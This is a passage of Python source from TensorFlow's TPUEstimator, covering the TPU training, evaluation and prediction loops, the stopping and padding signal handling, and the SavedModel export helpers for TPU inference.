# checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
iterations_per_loop_var = _create_or_get_iterations_per_loop()
mean_loss = math_ops.div(
total_loss,
math_ops.cast(iterations_per_loop_var, dtype=total_loss.dtype))
with ops.control_dependencies([mean_loss]):
# After TPU evaluation computation is done (the mean_loss tensor),
# reads all variables back from TPU and updates the eval step
# counter properly
internal_ops_to_run = _sync_variables_ops(ctx)
internal_ops_to_run.append(
_increase_eval_step_op(iterations_per_loop_var))
host_call_ret = host_calls.create_tpu_hostcall()
eval_metric_ops = {}
eval_update_ops = []
eval_metrics = host_call_ret.get('eval_metrics', {})
if eval_metrics:
# Creates a dummy metric update_op for all metrics. Estimator
# expects all metrics in `eval_metric_ops` have update_op and calls
# them one by one. The real metric update_ops are invoked in a
# separated thread. So, here give Estimator the dummy op for all
# metrics.
with ops.control_dependencies(internal_ops_to_run):
dummy_update_op = control_flow_ops.no_op()
for k, v in eval_metrics.items():
eval_metric_ops[k] = (v[0], dummy_update_op)
eval_update_ops.append(v[1])
else:
# If no eval metrics are passed, create an identity node for the
# loss and add `internal_ops_to_run` to its dependencies. So
# `internal_ops_to_run` can be executed.
with ops.control_dependencies(internal_ops_to_run):
mean_loss = array_ops.identity(mean_loss)
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
eval_update_ops + host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.evaluation_master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops)
] + input_hooks
if tpu_cluster_resolver.is_running_in_gce():
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if eval_hooks:
hooks.extend(eval_hooks)
return model_fn_lib.EstimatorSpec(
mode,
loss=mean_loss,
evaluation_hooks=hooks,
eval_metric_ops=eval_metric_ops,
scaffold=scaffold)
# Predict
assert mode == model_fn_lib.ModeKeys.PREDICT
(compile_op, dummy_predict_op, host_calls,
scaffold_fn, prediction_hooks) = _predict_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn)
scaffold = _get_scaffold(scaffold_fn)
with ops.control_dependencies([dummy_predict_op]):
internal_ops_to_run = _sync_variables_ops(ctx)
with ops.control_dependencies(internal_ops_to_run):
dummy_predict_op = control_flow_ops.no_op()
# In train and evaluation, the main TPU program is passed to monitored
# training session to run. Infeed enqueue and outfeed dequeue are
# executed in side threads. This is not the configuration for
# prediction mode.
#
# For prediction, the Estimator executes the EstimatorSpec.predictions
# directly and yield the element (via generator) to call site. So, the
# outfeed based prediction must be passed to MonitoredSession directly.
# Other parts of the TPU execution are organized as follows.
#
# 1. All outfeed based Tensors must be grouped with predictions Tensors
# to form a single invocation. This avoid the issue we might trigger
# multiple outfeeds incorrectly. To achieve this, `host_call` is
# placed in control_dependencies of `stopping_signals`, and
# `stopping_signals` is passed into _StoppingPredictHook, which sets
# the `stopping_signals` as SessionRunArgs. MonitoredSession merges
# all SessionRunArgs with the fetch in session.run together.
#
# 2. The TPU program (dummy_predict_op) and enqueue_ops (infeed Enqueue)
# are grouped together. They will be launched once and only once in
# side threads and they quit naturally according to the SAME stopping
# condition.
enqueue_ops.append(dummy_predict_op)
host_call_ret = host_calls.create_tpu_hostcall()
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
predictions = host_call_ret['predictions']
_verify_cross_hosts_transfer_size(
predictions,
message=(
'The estimated size for TPUEstimatorSpec.predictions is too '
'large.'))
signals = host_call_ret['signals']
with ops.control_dependencies(host_ops):
host_ops = [] # Empty, we do do not need it anymore.
scalar_stopping_signal = _StopSignals.as_scalar_stopping_signal(
signals)
predictions = _PaddingSignals.slice_tensor_or_dict(
predictions, signals)
hooks = [
_StoppingPredictHook(scalar_stopping_signal),
TPUInfeedOutfeedSessionHookForPrediction(
ctx, enqueue_ops, host_ops, rendezvous=self._rendezvous[mode],
tpu_compile_op=compile_op,
master=self._config.master,
session_config=self._session_config),
] + input_hooks
if prediction_hooks:
hooks.extend(prediction_hooks)
return model_fn_lib.EstimatorSpec(
mode,
prediction_hooks=hooks,
predictions=predictions,
scaffold=scaffold)
return _model_fn
def _export_output_to_tensors(export_output):
  """Get a list of `Tensors` used in `export_output`.

  Args:
    export_output: an `ExportOutput` object such as `ClassificationOutput`,
      `RegressionOutput`, or `PredictOutput`.

  Returns:
    a list of tensors used in export_output.

  Raises:
    ValueError: if `export_output` is not one of `ClassificationOutput`,
      `RegressionOutput`, or `PredictOutput`.
  """
  if isinstance(export_output, export_output_lib.ClassificationOutput):
    return [export_output.scores, export_output.classes]
  elif isinstance(export_output, export_output_lib.RegressionOutput):
    return [export_output.value]
  elif isinstance(export_output, export_output_lib.PredictOutput):
    return list(export_output.outputs.values())
  else:
    # Fixed ungrammatical message ("must be have type" -> "must have type").
    raise ValueError(
        '`export_output` must have type `ClassificationOutput`, '
        '`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _clone_export_output_with_tensors(export_output, tensors):
  """Clones `export_output` but with new `tensors`.

  Args:
    export_output: an `ExportOutput` object such as `ClassificationOutput`,
      `RegressionOutput`, or `PredictOutput`.
    tensors: a list of `Tensors` used to construct a new `export_output`.

  Returns:
    A dict similar to `export_output` but with `tensors`.

  Raises:
    ValueError: if `export_output` is not one of `ClassificationOutput`,
      `RegressionOutput`, or `PredictOutput`.
  """
  if isinstance(export_output, export_output_lib.ClassificationOutput):
    if len(tensors) != 2:
      raise ValueError('tensors must be of length 2; '
                       'got {}.'.format(len(tensors)))
    return export_output_lib.ClassificationOutput(*tensors)
  elif isinstance(export_output, export_output_lib.RegressionOutput):
    if len(tensors) != 1:
      # Punctuation made consistent with the length-2 message above.
      raise ValueError('tensors must be of length 1; '
                       'got {}.'.format(len(tensors)))
    return export_output_lib.RegressionOutput(*tensors)
  elif isinstance(export_output, export_output_lib.PredictOutput):
    return export_output_lib.PredictOutput(
        dict(zip(export_output.outputs.keys(), tensors)))
  else:
    # Fixed ungrammatical message ("must be have type" -> "must have type").
    raise ValueError(
        '`export_output` must have type `ClassificationOutput`, '
        '`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
  """Executes `model_fn_wrapper` multiple times on all TPU shards."""
  iterations = _create_or_get_iterations_per_loop()
  # Per-step eval computation plus its captured side outputs.
  (single_tpu_eval_step, host_calls, captured_scaffold_fn,
   captured_eval_hooks) = model_fn_wrapper.convert_to_single_tpu_eval_step(
       dequeue_fn)

  @tpu_function.on_device_training_loop
  def multi_tpu_eval_steps_on_single_shard():
    # Repeat the eval step `iterations` times, accumulating from zero loss.
    return training_loop.repeat(iterations, single_tpu_eval_step, [_ZERO_LOSS])

  compile_op, loss = tpu.split_compile_and_shard(
      multi_tpu_eval_steps_on_single_shard,
      inputs=[],
      num_shards=ctx.num_replicas,
      outputs_from_all_shards=False,
      device_assignment=ctx.device_assignment)

  # Only one shard's outputs are returned; unwrap it.
  return (compile_op, loss[0], host_calls, captured_scaffold_fn,
          captured_eval_hooks.get())
def _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
  """Executes `model_fn_wrapper` multiple times on all TPU shards."""
  iterations = _create_or_get_iterations_per_loop()
  (single_tpu_train_step, host_call, captured_scaffold_fn,
   captured_training_hooks) = (
       model_fn_wrapper.convert_to_single_tpu_train_step(dequeue_fn))

  @tpu_function.on_device_training_loop
  def multi_tpu_train_steps_on_single_shard():
    # Counted loop carrying [step, loss]; drop the counter on return.
    loop_outputs = training_loop.while_loop(
        lambda step, unused_loss: step < iterations,
        lambda step, unused_loss: [step + 1, single_tpu_train_step(step)],
        inputs=[0, _INITIAL_LOSS])
    return loop_outputs[1:]

  compile_op, loss = tpu.split_compile_and_shard(
      multi_tpu_train_steps_on_single_shard,
      inputs=[],
      num_shards=ctx.num_replicas,
      outputs_from_all_shards=False,
      device_assignment=ctx.device_assignment)

  # Only one shard's outputs are returned; unwrap it.
  return (compile_op, loss[0], host_call, captured_scaffold_fn,
          captured_training_hooks.get())
def _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
  """Executes `model_fn_wrapper` multiple times on all TPU shards."""
  (single_tpu_predict_step, host_calls, captured_scaffold_fn,
   captured_predict_hooks
  ) = model_fn_wrapper.convert_to_single_tpu_predict_step(dequeue_fn)

  @tpu_function.on_device_training_loop
  def multi_tpu_predict_steps_on_single_shard():

    def cond(scalar_stopping_signal):
      # Keep iterating until the stopping signal fires.
      return math_ops.logical_not(
          _StopSignals.should_stop(scalar_stopping_signal))

    return training_loop.while_loop(
        cond,
        single_tpu_predict_step,
        inputs=[_StopSignals.NON_STOPPING_SIGNAL],
        name=b'loop')

  compile_op, dummy_predict_op = tpu.split_compile_and_shard(
      multi_tpu_predict_steps_on_single_shard,
      inputs=[],
      num_shards=ctx.num_replicas,
      outputs_from_all_shards=False,
      device_assignment=ctx.device_assignment)

  # Only one shard's outputs are returned; unwrap it.
  return (compile_op, dummy_predict_op[0], host_calls, captured_scaffold_fn,
          captured_predict_hooks.get())
def _wrap_computation_in_while_loop(device, op_fn):
  """Wraps the ops generated by `op_fn` in tf.while_loop."""

  def _body(step):
    # Sequence the ops from `op_fn` before advancing the counter.
    with ops.control_dependencies(op_fn()):
      return step + 1

  loop_var = _create_or_get_iterations_per_loop()
  with ops.device(device):
    total = array_ops.identity(loop_var)
    # By setting parallel_iterations=1, the parallel execution in while_loop is
    # basically turned off.
    return control_flow_ops.while_loop(
        lambda step: step < total,
        _body, [constant_op.constant(0)],
        parallel_iterations=1)
def _wrap_computation_in_while_loop_with_stopping_signals(device, op_fn):
  """Wraps the ops generated by `op_fn` in tf.while_loop."""

  def _should_continue(scalar_stopping_signal):
    return math_ops.logical_not(
        _StopSignals.should_stop(scalar_stopping_signal))

  def _body(unused_scalar_stopping_signal):
    results = op_fn()
    # Run the generated ops, then carry the fresh stopping signal forward as
    # the sole loop variable.
    with ops.control_dependencies(results['ops']):
      return _StopSignals.as_scalar_stopping_signal(results['signals'])

  # By setting parallel_iterations=1, the parallel execution in while_loop is
  # basically turned off.
  with ops.device(device):
    return control_flow_ops.while_loop(
        _should_continue,
        _body, [_StopSignals.NON_STOPPING_SIGNAL],
        parallel_iterations=1)
def _validate_tpu_training_graph():
  """Validate graph before running distributed training.

  Raises:
    ValueError: If the graph seems invalid for running on device
  """
  if control_flow_util.ENABLE_CONTROL_FLOW_V2:
    return  # b/124241278

  # CrossReplicaSum ops are introduced by the CrossShardOptimizer wrapper;
  # require at least one in the graph.
  graph_has_cross_replica_sum = any(
      op.type == _CROSS_REPLICA_SUM_OP
      for op in ops.get_default_graph().get_operations())
  if not graph_has_cross_replica_sum:
    raise ValueError(
        'CrossShardOptimizer must be used for model training on TPUs.')
class _CapturedObject(object):
"""A placeholder to capture an object.
This is useful when we need to capture a Python object in the Tensorflow
control flow body function and use it outside the control flow.
"""
def __init__(self):
self._object = None
self._captured = False
def capture(self, o):
if self._captured:
raise RuntimeError(
'InternalError: Object can capture only once. Please file bug.')
self._captured = True
self._object = o
def get(self):
if not self._captured:
raise RuntimeError(
'InternalError: Object is not captured properly before `get`. '
'Please file bug.')
return self._object
def _get_scaffold(captured_scaffold_fn):
  """Retrieves the Scaffold from `captured_scaffold_fn`."""
  with _CapturingContext(message='Inside scaffold_fn'):
    scaffold_fn = captured_scaffold_fn.get()
    if not scaffold_fn:
      scaffold = None
    else:
      scaffold = scaffold_fn()
      if scaffold is None:
        raise ValueError(
            'TPUEstimatorSpec.scaffold_fn returns None, which is not allowed')

  if scaffold:
    wrapped_finalize = scaffold.finalize

    def _finalize():
      # Also capture illegal TPU references created during finalize.
      with _CapturingContext('Inside Scaffold.finalize'):
        wrapped_finalize()

    scaffold.finalize = _finalize
  return scaffold
class _CapturingContext(control_flow_ops.ControlFlowContext):
  """Tracks references to Tensors defined in TPU replication.

  Installed as the graph's control-flow context (see `__enter__`) so that
  every op created inside the `with` block passes through `AddOp`, where
  illegal references to TPU-replicated tensors are rejected.
  """

  def __init__(self, message):
    control_flow_ops.ControlFlowContext.__init__(self)
    # Prefix used in the AddOp error message to identify the capture site.
    self._message = message

  def to_control_flow_context_def(self, context_def, export_scope=None):
    # pylint: disable=useless-super-delegation
    # NOTE(slebedev): the method is required by `ControlFlowContext`.
    super(_CapturingContext, self).to_control_flow_context_def(
        context_def, export_scope)

  def AddOp(self, op):  # pylint: disable=invalid-name
    # Reject any op whose input comes from a TPU-replicated computation.
    for c in op.inputs:
      if tpu._TPU_REPLICATE_ATTR in c.op.node_def.attr:  # pylint: disable=protected-access
        raise ValueError('{}: Op {} depends on TPU computation {}, '
                         'which is not allowed.'.format(self._message, op, c))

  def __enter__(self):
    # Swap ourselves in as the graph's control-flow context, remembering the
    # previous one for restoration in __exit__.
    # pylint: disable=protected-access
    self._g = ops.get_default_graph()
    self._old = self._g._get_control_flow_context()
    self._g._set_control_flow_context(self)
    # pylint: enable=protected-access

  def __exit__(self, _, __, ___):  # pylint: disable=invalid-name
    self._g._set_control_flow_context(self._old)  # pylint: disable=protected-access
class _Inputs(object):
"""A data structure representing the input_fn returned values.
This also supports the returned value from input_fn as `Dataset`.
"""
def __init__(self, features=None, labels=None, dataset=None, signals=None):
if dataset is not None and (features is not None or labels is not None or
signals is not None):
raise RuntimeError('Internal Error: Either (features and labels) or '
'dataset should be provided, not both. Please file '
'bug')
self._features = features
self._labels = labels
self._signals = signals
self._dataset = dataset
self._iterator = None
@staticmethod
def from_input_fn(return_values):
"""Returns an `_Inputs` instance according to `input_fn` return value."""
if isinstance(return_values, dataset_ops.DatasetV2):
dataset = return_values
return _Inputs(dataset=dataset)
features, labels = _Inputs._parse_inputs(return_values)
return _Inputs(features, labels)
@staticmethod
def _parse_inputs(return_values):
if isinstance(return_values, tuple):
features, labels = return_values
else:
features, labels = return_values, None
return features, labels
@property
def is_dataset(self):
"""Returns True if the return value from input_fn is Dataset."""
return self._dataset is not None
def dataset_initializer(self):
"""Returns the dataset's initializer.
The initializer must be run before calling `features_and_labels`.
"""
self._iterator = dataset_ops.make_initializable_iterator(self._dataset)
return self._iterator.initializer
def features_and_labels(self):
"""Gets `features` and `labels`."""
if self.is_dataset:
if self._iterator is None:
raise RuntimeError('Internal error: Must run dataset_initializer '
'before calling features_and_labels(). Please file '
'a bug!')
return _Inputs._parse_inputs(self._iterator.get_next())
return (self._features, self._labels)
def signals(self):
return self._signals
@property
def dataset(self):
return self._dataset
class _InputsWithStoppingSignals(_Inputs):
  """Inputs with `_StopSignals` inserted into the dataset."""

  def __init__(self,
               dataset,
               batch_size,
               add_padding=False,
               num_invocations_per_step=1):

    assert dataset is not None
    # Real batches carry stop=False signals.
    user_provided_dataset = dataset.map(
        _InputsWithStoppingSignals.insert_stopping_signal(
            stop=False, batch_size=batch_size, add_padding=add_padding))
    if num_invocations_per_step == 1:
      # A single extra batch (reusing the first batch's structure) carries the
      # stop=True signal.
      final_batch_dataset = dataset.take(1).map(
          _InputsWithStoppingSignals.insert_stopping_signal(
              stop=True, batch_size=batch_size, add_padding=add_padding))
    else:
      # We append (2 * num_invocations_per_step - 1) batches for exhausting the
      # user_provided_dataset and stop properly.
      # For example, if num_invocations_per_step is 2, we append 3 additional
      # padding batches: b1, b2, b3.
      # If user_provided_dataset contains two batches: a1, a2
      # Step 1: [a1, a2]
      # Step 2: [b1, b2] -> STOP
      # If user_provided_dataset contains three batches: a1, a2, a3.
      # The training loops:
      # Step 1: [a1, a2]
      # Step 2: [a3, b1]
      # Step 3: [b2, b3] -> STOP.
      final_batch_dataset = dataset.take(1).map(
          _InputsWithStoppingSignals.insert_stopping_signal(
              stop=True, batch_size=batch_size, add_padding=add_padding))
      final_batch_dataset = final_batch_dataset.repeat(
          2 * num_invocations_per_step - 1)

      def _set_mask(data_dict):
        # Mark every element of the appended batches as padding.
        signals = data_dict['signals']
        signals['padding_mask'] = array_ops.ones_like(signals['padding_mask'])
        data_dict['signals'] = signals
        return data_dict

      # Mask out the extra batch.
      final_batch_dataset = final_batch_dataset.map(_set_mask)

    dataset = user_provided_dataset.concatenate(final_batch_dataset).prefetch(2)

    super(_InputsWithStoppingSignals, self).__init__(dataset=dataset)
    self._current_inputs = None

  def features_and_labels(self):
    """Gets `features` and `labels`; must alternate with `signals` calls."""
    if self._current_inputs is not None:
      raise RuntimeError(
          'Internal Error: The previous inputs have not been properly '
          'consumed. First call features_and_labels, then call signals.')

    inputs_with_signals = self._iterator.get_next()
    features = inputs_with_signals['features']
    labels = inputs_with_signals.get('labels')

    # Stash the full dict so the paired `signals()` call can consume it.
    self._current_inputs = inputs_with_signals
    return features, labels

  def signals(self):
    """Returns the `Signals` from `_Inputs`."""
    if self._current_inputs is None:
      raise RuntimeError(
          'Internal Error: The current inputs have not been properly '
          'generated. First call features_and_labels, then call signals.')
    signals = self._current_inputs['signals']
    self._current_inputs = None
    return signals

  @staticmethod
  def insert_stopping_signal(stop, batch_size, add_padding=False):
    """Inserts stopping_signal into dataset via _map_fn.

    Here we change the data structure in the dataset, such that the return value
    is a dictionary now and `features`, `labels`, and `signals` are three
    distinguished keys in that dict. This provides a better structure, which
    eases the process to decompose the inputs (see `features_and_labels`).

    Args:
      stop: bool, state of current stopping signals.
      batch_size: int, batch size.
      add_padding: bool, whether to pad the tensor to full batch size.

    Returns:
      A map_fn passed to dataset.map API.
    """

    def _map_fn(*args):
      """The map fn to insert signals."""
      if len(args) == 1:
        # Unpack the single Tensor/dict argument as features. This is required
        # for the input_fn returns no labels.
        args = args[0]
      features, labels = _Inputs._parse_inputs(args)
      new_input_dict = {}

      if add_padding:
        padding_mask, features, labels = (
            _PaddingSignals.pad_features_and_labels(features, labels,
                                                    batch_size))

        new_input_dict['features'] = features
        if labels is not None:
          new_input_dict['labels'] = labels

      else:
        new_input_dict['features'] = features
        if labels is not None:
          new_input_dict['labels'] = labels
        padding_mask = None

      new_input_dict['signals'] = _StopSignals(
          stop=stop, batch_size=batch_size,
          padding_mask=padding_mask).as_dict()

      return new_input_dict

    return _map_fn
class _StopSignals(object):
  """Signals class holding all logic to handle TPU stopping condition."""

  NON_STOPPING_SIGNAL = False
  STOPPING_SIGNAL = True

  def __init__(self, stop, batch_size, padding_mask=None):
    self._stop = stop
    self._batch_size = batch_size
    self._padding_mask = padding_mask

  def as_dict(self):
    """Returns the signals as Python dict."""
    # A [batch_size, 1] bool tensor: all ones when stopping, else all zeros.
    make_signal = array_ops.ones if self._stop else array_ops.zeros
    signals = {
        'stopping': make_signal(shape=[self._batch_size, 1], dtype=dtypes.bool)
    }
    if self._padding_mask is not None:
      signals['padding_mask'] = self._padding_mask
    return signals

  @staticmethod
  def as_scalar_stopping_signal(signals):
    # Collapse the per-batch signal to one scalar element.
    return array_ops.identity(signals['stopping'][0][0])

  @staticmethod
  def should_stop(scalar_stopping_signal):
    """Detects whether scalar_stopping_signal indicates stopping."""
    if not isinstance(scalar_stopping_signal, ops.Tensor):
      # For non Tensor case, it is used in SessionRunHook. So, we cannot modify
      # the graph anymore. Here, we use pure Python.
      return bool(scalar_stopping_signal)
    # STOPPING_SIGNAL is a constant True. Here, the logical_and is just the TF
    # way to express the bool check whether scalar_stopping_signal is True.
    return math_ops.logical_and(scalar_stopping_signal,
                                _StopSignals.STOPPING_SIGNAL)
class _PaddingSignals(object):
  """Signals class holding all logic to handle padding."""

  @staticmethod
  def pad_features_and_labels(features, labels, batch_size):
    """Pads out the batch dimension of features and labels."""
    real_batch_size = array_ops.shape(
        _PaddingSignals._find_any_tensor(features))[0]

    batch_size_tensor = constant_op.constant(batch_size, dtypes.int32)

    check_greater = check_ops.assert_greater_equal(
        batch_size_tensor,
        real_batch_size,
        data=(batch_size_tensor, real_batch_size),
        message='The real batch size should not be greater than batch_size.')

    with ops.control_dependencies([check_greater]):
      missing_count = batch_size_tensor - real_batch_size

    def pad_single_tensor(tensor):
      """Pads out the batch dimension of a tensor to the complete batch_size."""
      rank = len(tensor.shape)
      assert rank > 0
      # Pad only along axis 0 (the batch axis); all other axes are untouched.
      padding = array_ops.stack([[0, missing_count]] + [[0, 0]] * (rank - 1))
      padded_shape = (batch_size,) + tuple(tensor.shape[1:])
      padded_tensor = array_ops.pad(tensor, padding)
      padded_tensor.set_shape(padded_shape)
      return padded_tensor

    def nest_pad(tensor_or_dict):
      return nest.map_structure(pad_single_tensor, tensor_or_dict)

    features = nest_pad(features)
    if labels is not None:
      labels = nest_pad(labels)

    padding_mask = _PaddingSignals._padding_mask(real_batch_size, missing_count,
                                                 batch_size)

    return padding_mask, features, labels

  @staticmethod
  def slice_tensor_or_dict(tensor_or_dict, signals):
    """Slice the real Tensors according to padding mask in signals."""
    padding_mask = signals['padding_mask']
    batch_size = array_ops.shape(padding_mask)[0]

    def verify_batch_size(tensor):
      check_batch_size = math_ops.equal(batch_size, tensor.shape[0])
      with ops.control_dependencies([check_batch_size]):
        return array_ops.identity(tensor)

    def slice_single_tensor(tensor):
      rank = len(tensor.shape)
      assert rank > 0
      # Real rows precede padding, so taking a batch-axis prefix of length
      # (batch_size - #padded) drops exactly the padded rows.
      real_batch_size = batch_size - math_ops.reduce_sum(padding_mask)
      return verify_batch_size(tensor)[0:real_batch_size]

    # As we split the Tensors to all TPU cores and concat them back, it is
    # important to ensure the real data is placed before padded ones, i.e.,
    # order is preserved. By that, the sliced padding mask should have all 0's.
    # If this assertion failed, the slice logic here would not hold.
    sliced_padding_mask = slice_single_tensor(padding_mask)
    assert_padding_mask = math_ops.equal(
        math_ops.reduce_sum(sliced_padding_mask), 0)

    with ops.control_dependencies([assert_padding_mask]):
      should_stop = _StopSignals.should_stop(
          _StopSignals.as_scalar_stopping_signal(signals))

    is_full_batch = math_ops.equal(math_ops.reduce_sum(padding_mask), 0)

    def slice_fn(tensor):
      # If the current batch is full batch or part of stopping signals, we do
      # not need to slice to save performance.
      return control_flow_ops.cond(
          math_ops.logical_or(should_stop, is_full_batch),
          (lambda: verify_batch_size(tensor)),
          (lambda: slice_single_tensor(tensor)))

    return nest.map_structure(slice_fn, tensor_or_dict)

  @staticmethod
  def _find_any_tensor(batch_features):
    # Any one Tensor suffices: all feature tensors share the batch dimension.
    tensors = [
        x for x in nest.flatten(batch_features) if isinstance(x, ops.Tensor)
    ]
    if not tensors:
      raise ValueError('Cannot find any Tensor in features dict.')
    return tensors[0]

  @staticmethod
  def _padding_mask(real_batch_size, missing_count, batch_size):
    # 0 for real rows, 1 for padded rows; shape [batch_size].
    padding_mask = array_ops.concat([
        array_ops.zeros((real_batch_size,), dtype=dtypes.int32),
        array_ops.ones((missing_count,), dtype=dtypes.int32)
    ],
                                    axis=0)
    padding_mask.set_shape((batch_size,))
    return padding_mask
def _verify_cross_hosts_transfer_size(tensor_dict, message):
  """Raises if the tensors in `tensor_dict` are too large to transfer.

  Args:
    tensor_dict: Dict mapping names to Tensors. Sizes are computed from the
      static `tensor.shape` and `tensor.dtype.size`, so shapes are assumed to
      be fully defined here.
    message: str, prefix prepended to the error message on failure.

  Raises:
    ValueError: If the summed byte size reaches `_ONE_GIGABYTE`, which would
      exceed the protobuf transfer limit.
  """
  total_size = 0
  tensor_structure = {}
  for key, tensor in tensor_dict.items():
    shape = tensor.shape
    # BUG FIX: np.product is deprecated and removed in NumPy 2.0; np.prod is
    # the identical, supported spelling.
    size = np.prod(shape) * tensor.dtype.size
    tensor_structure[key] = shape
    total_size += size
  if total_size >= _ONE_GIGABYTE:
    raise ValueError(
        '{} The transfer size is larger than the protobuf limit. Please '
        'consider to use Tensors with smaller shapes or reduce batch '
        'size. Given:\n'
        '{}'.format(
            message, '\n'.join([
                ' -- Key: {}, Shape: {}'.format(k, v)
                for k, v in tensor_structure.items()
            ])))
def _add_item_to_params(params, key, value):
"""Adds a new item into `params`."""
if hasattr(params, 'set_hparam'):
# For HParams, we need to use special API.
if key in params:
params.set_hparam(key, value)
else:
params.add_hparam(key, value)
else:
# Now params is Python dict.
params[key] = value
def export_estimator_savedmodel(estimator,
                                export_dir_base,
                                serving_input_receiver_fn,
                                assets_extra=None,
                                as_text=False,
                                checkpoint_path=None):
  """Export `Estimator` trained model for TPU inference.

  Wraps the estimator's `model_fn` in a `TPUEstimator` so the exported
  SavedModel contains the TPU serving graph.

  Args:
    estimator: `Estimator` with which model has been trained.
    export_dir_base: A string containing a directory in which to create
      timestamped subdirectories containing exported SavedModels.
    serving_input_receiver_fn: A function that takes no argument and returns a
      `ServingInputReceiver` or `TensorServingInputReceiver`.
    assets_extra: A dict specifying how to populate the assets.extra directory
      within the exported SavedModel, or `None` if no extra assets are needed.
    as_text: whether to write the SavedModel proto in text format.
    checkpoint_path: The checkpoint path to export. If `None` (the default),
      the most recent checkpoint found within the model directory is chosen.

  Returns:
    The string path to the exported directory.
  """
  # `TPUEstimator` requires `tpu_config.RunConfig`, so we cannot use
  # `estimator.config`.
  config = tpu_config.RunConfig(model_dir=estimator.model_dir)
  est = TPUEstimator(
      estimator._model_fn,  # pylint: disable=protected-access
      config=config,
      params=estimator.params,
      use_tpu=True,
      # Batch sizes are required by the TPUEstimator constructor but are not
      # used for export, hence the arbitrary values.
      train_batch_size=2048,  # Does not matter.
      eval_batch_size=2048,  # Does not matter.
  )
  return est.export_saved_model(export_dir_base, serving_input_receiver_fn,
                                assets_extra, as_text, checkpoint_path)
def model_fn_inference_on_tpu(model_fn,
                              features,
                              labels=None,
                              config=None,
                              params=None,
                              batch_config=None):
  """Convenience wrapper for export_saved_model API v2 for a model_fn.

  It attempts to execute the entire model function on the TPU for prediction.
  Note that this does not support features which are SparseTensors. If you have
  SparseTensor features, consider partitioning your model function further and
  use inference_on_tpu.

  Args:
    model_fn: the model_fn for which we want to inference on TPU.
    features: a tensor or dict of tensors, serves as the feature inputs to the
      model.
    labels: a tensor or dict of tensors, serves as the labels inputs to the
      model.
    config: auxiliary config to the Estimator.
    params: hparams that we want to pass to the model_fn.
    batch_config: a named tuple to wrap the inference batching configuration
      inputs.

  Returns:
    An EstimatorSpec containing the outputs in export_outputs and predictions.
  """
  computation, capture = _build_computation_for_inference(
      model_fn, labels, config, params)
  tensors = call_computation(
      features,
      computation,
      batch_config=batch_config)
  estimator_spec, export_outputs_dict, predictions_dict, none_indices = (
      capture.get())
  # `tensors` is laid out as [predictions..., non-None export outputs...],
  # matching the return value of the computation built in
  # `_build_computation_for_inference()`.
  predictions_list = tensors[:len(predictions_dict)]
  export_outputs_list_without_none = tensors[len(predictions_dict):]
  # Reinsert `None`s which we've taken out in
  # `_build_computation_for_inference()`. `none_indices` holds the positions
  # (in ascending order) where `None` belongs in the flattened output list.
  export_outputs_list = []
  while none_indices or export_outputs_list_without_none:
    if none_indices and none_indices[0] == len(export_outputs_list):
      export_outputs_list.append(None)
      none_indices.pop(0)
    else:
      export_outputs_list.append(export_outputs_list_without_none.pop(0))
  # Reconstruct `export_outputs` with updated tensors.
  new_export_outputs_dict = nest.pack_sequence_as(export_outputs_dict,
                                                  export_outputs_list)
  export_outputs = estimator_spec.export_outputs
  new_export_outputs = collections.OrderedDict(
      (k, _clone_export_output_with_tensors(export_outputs[k], v))
      for k, v in six.iteritems(new_export_outputs_dict))
  # Reconstruct `predictions` with updated tensors.
  new_predictions = nest.pack_sequence_as(predictions_dict, predictions_list)
  # A bare-Tensor `predictions` was wrapped in a single-entry dict under a
  # sentinel key on the way in; unwrap it so callers get the structure the
  # model_fn originally produced.
  if (len(new_predictions) == 1 and
      _KEY_WHEN_PREDICTIONS_IS_A_TENSOR in new_predictions):
    new_predictions = new_predictions[_KEY_WHEN_PREDICTIONS_IS_A_TENSOR]
  return estimator_spec._replace(
      export_outputs=new_export_outputs, predictions=new_predictions)
def _build_computation_for_inference(model_fn,
                                     labels,
                                     config,
                                     params):
  """Builds a computation which calls the model_fn for inference.

  Returns:
    A `(computation, capture)` pair. `computation` takes the feature input and
    returns the flattened TPU output tensors; `capture` is a `_CapturedObject`
    that, after `computation` runs, holds
    `(estimator_spec, export_outputs_dict, predictions_dict, none_indices)`.
  """
  capture = _CapturedObject()

  def computation(computation_input):
    """Computation to be passed to `TPUPartitionedCall()`."""
    tpu_computation, tpu_capture = _build_tpu_computation_for_inference(
        model_fn, computation_input, labels, config, params)
    tensors_on_cpu = tpu.rewrite(tpu_computation)
    tpu.prune_unconnected_ops_from_xla(ops.get_default_graph())
    (estimator_spec, export_outputs_dict, export_outputs_list,
     predictions_dict) = (
         tpu_capture.get())
    # `tensors_on_cpu` mirrors the TPU computation's return value:
    # predictions first, then the non-None export outputs.
    predictions_list = tensors_on_cpu[:len(predictions_dict)]
    export_outputs_tpu_on_cpu_list = tensors_on_cpu[len(predictions_dict):]
    # Reconstruct tensors used in export_outputs, with TPU tensors replaced
    # with their CPU counterpart returned from `rewrite_for_inference()`.
    # `function.Defun()` does not like `None`s in return values, so we leave
    # `None`s out but record their positions for later reconstruction.
    export_outputs_list_without_none = []
    none_indices = []
    for i, t in enumerate(export_outputs_list):
      if t is None:
        none_indices.append(i)
      else:
        export_outputs_list_without_none.append(
            export_outputs_tpu_on_cpu_list.pop(0))
    # The caller (model_fn_inference_on_tpu) retrieves these to rebuild the
    # final EstimatorSpec.
    capture.capture(
        (estimator_spec, export_outputs_dict, predictions_dict, none_indices))
    return predictions_list + export_outputs_list_without_none

  return computation, capture
def _build_tpu_computation_for_inference(model_fn, features, labels, config,
                                         params):
  """Builds the TPU computation for inference on TPU.

  Returns:
    A `(computation, capture)` pair. `computation` takes no arguments and
    returns the flattened predictions followed by the non-None export-output
    tensors; `capture` is a `_CapturedObject` holding
